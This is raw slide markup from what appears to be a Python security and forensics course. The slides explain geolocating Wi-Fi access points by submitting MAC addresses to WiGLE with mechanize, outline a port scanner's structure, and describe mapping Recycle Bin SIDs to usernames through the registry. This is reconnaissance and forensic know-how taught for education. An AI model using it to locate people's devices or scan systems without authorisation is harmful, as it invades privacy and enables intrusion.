          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">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2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Using Mechanize to submit the Mac address to Wigle.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="919" name="Google Shape;919;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2103675"/>
            <a:ext cx="9613800" cy="4572000"/>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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>There are several alternative tools that can be used instead of maclocate for finding the physical location of a network access point. Some examples include:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>WiGLE (Wireless Geographic Logging Engine) - A free online database of wireless access points that can be searched by MAC address, SSID, or GPS coordinates.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Mozilla Location Service - An open-source project that allows users to submit and access WiFi access point location data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Kismet - A wireless network detector, sniffer, and intrusion detection system that can log and display information about nearby access points.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="920" name="Google Shape;920;p20"/>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2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Using Mechanize to submit the Mac address to Wigle.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="Google Shape;926;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2103675"/>
            <a:ext cx="9613800" cy="45720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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Airodump-ng - A command-line tool that can capture information about wireless access points and clients.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Acrylic Wi-Fi Professional - A commercial tool that provides detailed information about nearby wireless networks, including GPS coordinates.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>WifiInfoView - A small utility that can scan wireless networks and display their details, including MAC address, SSID, signal strength, and GPS coordinates (if available).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It is worth noting that the accuracy and availability of location information of access points may vary depending on the tool and the source of the data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="927" name="Google Shape;927;p21"/>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23"/>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334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The information obtained from wigle.net can be used to find the exact location of a wireless access point using a Python script. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The mechanize library can be used to automate the process of logging in to the website and accessing the location data. The mechanize library can be found at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.search.sourceforge.net/mechanize/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>To use mechanize library in a script, an instance of a mechanize browser must be created, and then the wigle.net website can be opened. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="933" name="Google Shape;933;p23"/>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200"/>
              <a:t>Using Mechanize to submit the Mac address to Wigle contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="934" name="Google Shape;934;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">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25"/>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334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The username and password are encoded as parameters and sent in a request to log in. This allows us to reuse the authentication cookies, so we don't need to log in multiple times. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Once logged in the script can extract the location information of the access point by specifying the SSID or MAC address of the access point. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It is worth noting that the usage of this script should be in compliance with the website's policy and terms of service.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="940" name="Google Shape;940;p2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200"/>
              <a:t>Using Mechanize to submit the Mac address to Wigle contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="941" name="Google Shape;941;p25"/>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2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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Using Mechanize to submit the Mac address to Wigle contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="947" name="Google Shape;947;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680320" y="2336873"/>
            <a:ext cx="11348281" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="330200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2060"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>After logging in to the wigle website using the Python script, we can use the mechanize library to create an HTTP post request using the netid as the MAC address of the wireless access point we are trying to locate. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="330200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2060"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This post request is sent to the wigle database, which returns the location information of the access point. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="330200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2060"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The returned result includes the latitude and longitude coordinates of the access point. These coordinates are stored in variables, such as maplat for latitude and maplon for longitude.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="948" name="Google Shape;948;p27"/>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e9adf94182_2_56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="8596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BUILDING A PORT SCANNER</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;g1e9adf94182_2_56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402075" y="2279600"/>
            <a:ext cx="10490400" cy="3599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1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In our first step, we accept the hostname and port from the user. For this, our program utilizes the optparse library for parsing command line options. The call to optparse. OptionPaser([usage message]) creates an Instance of an option parser. Next, parser.add_option specifies the individual command line options for our script.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Next, we will build two functions connScan and portScan. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>But then now optparse is deprecated since version 3.2: The </a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="en-US" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>optparse</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> module is deprecated and will not be developed further; development will continue with the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="en-US" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>argparse</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> module. </a:t>
            </a:r>
            <a:endParaRPr i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="127000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="469900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="469900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">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2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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Using Mechanize to submit the Mac address to Wigle contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;p29"/>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330200" lvl="0" marL="330200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2060"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> They are returned as a tuple, which contains both the latitude and longitude values. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="330200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2060"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It is worth noting that the returned result is an approximation of the location of the access point, and the accuracy of the location may vary depending on the number of access points in the area and the availability of location information in the database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="330200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2060"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Also, it is important to keep in mind that usage of the script should be in compliance with the website's policy and terms of service.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="955" name="Google Shape;955;p29"/>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3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500"/>
              <a:t>Recover deleted files in the recycle bin using python</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;p3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SzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The folder "Recycle Bin" is a feature in Windows that is used to store deleted files. When a file is deleted, it is marked as deleted but not actually removed from the hard drive. The Recycle Bin directory is associated with a unique account on a machine, which is identified by a SID (Security Identifier).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>We can use the "os" module in Python to find the deleted items in the Recycle Bin. The os module allows for interaction with the file system, including the Recycle Bin.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="962" name="Google Shape;962;p30"/>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3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500"/>
              <a:t>Recover deleted files in the recycle bin using python</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="968" name="Google Shape;968;p3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Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>To convert the user SID into the exact username, we can inspect the Windows registry keys located at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList&lt;SID&gt;\ProfileImagePath, which returns a value of %SystemDrive%\Documents and Settings&lt;USERID&gt;. This allows us to match the SID with the corresponding username of the user who deleted the files.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
